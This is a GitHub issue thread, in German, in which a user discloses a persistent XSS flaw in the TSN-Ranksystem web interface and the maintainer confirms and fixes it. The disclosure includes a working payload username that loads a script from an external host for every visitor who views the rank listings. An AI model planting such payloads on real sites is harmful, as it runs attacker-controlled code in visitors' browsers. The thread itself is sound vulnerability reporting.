### ISSUE TITLE
Persistent XSS Vulnerability

### ISSUE THREAD

**Issue by JVMerkle** [Newcomer1989/TSN-Ranksystem#443]
Hallo,

es ist mir gelungen durch Persistent Cross Site Scripting, Skripte von externen Seiten im Browser auszuführen. Dies kommt dadurch Zustande, dass HTML Kontrollcharakter im TS3-Benutzernamen nicht verhindert, bzw. der Name nicht escaped wird. Hierfür muss der Angreifer lediglich solange auf dem TS3 Server verweilen, bis sein Benutzername in der Datenbank gespeichert wird.

### Beispiel 
Benutzername: `<script src=//abc.de></script>`
und `abc.de` serviert im root ein JS-File mit dem Inhalt `alert('Some bad code');`
=> Skript wird für **alle** Besucher ~~auf jeder Seite~~ ausgeführt

Je nach Kontext muss `abc.de` ein TLS Zertifikat mitbringen, da der Browser das Skript sonst nicht lädt.

### Lösungsansatz
Benutzernamen mit der Funktion `htmlspecialchars` (s. [Dokumentation](http://php.net/manual/de/function.htmlspecialchars.php)) escapen. Das kann vor dem Speichern in die DB, aber auch kurz vor der Ausgabe an den Client geschehen.

**Edit**
Skript wird natürlich nur ausgeführt, wenn der entsprechende Benutzername auf der Website dargestellt werden soll (z.B. Rank-Listing, Top-User etc.)

**Comment by Newcomer1989** [comment]
Ist grundsätzlich im Code schon berücksichtigt, aber in der Tat an zwei Stellen fehlt es noch.

Wird mit der nächsten Version bereinigt. Thx für den Hinweis.

Ein Sicherheitsrisiko sollte es allerdings kaum darstellen, da es mit der Limitierung der 30 Zeichen nahezu unmöglich ist entsprechenden Code einzuschleusen.

Wenn du magst, kann du dich aber gerne mal auf unserem Public TS melden (TS Adresse: ts-n.net). Wir würden dir dann eine Pre-Version bereit stellen, in der du dich gerne austoben kannst ;-)

**Comment by JVMerkle** [comment]
Naja, also ich konnte beliebigen Code einschleusen. Man benötigt dafür eine Domain mit 5 Chars (SLD + TLD), ganz sooo unmöglich ist es also nicht unter dem Limit zu bleiben :)

Was meinst du mit Pre-Version, habt ihr/du noch einen anderen Stand der nicht auf GitHub ist?

**Comment by Newcomer1989** [comment]
Sollte mit Version 1.2.6 behoben sein.

Falls es noch Probleme geben sollte, bitte noch einmal bescheid geben oder gerne auch einen pull request erstellen.
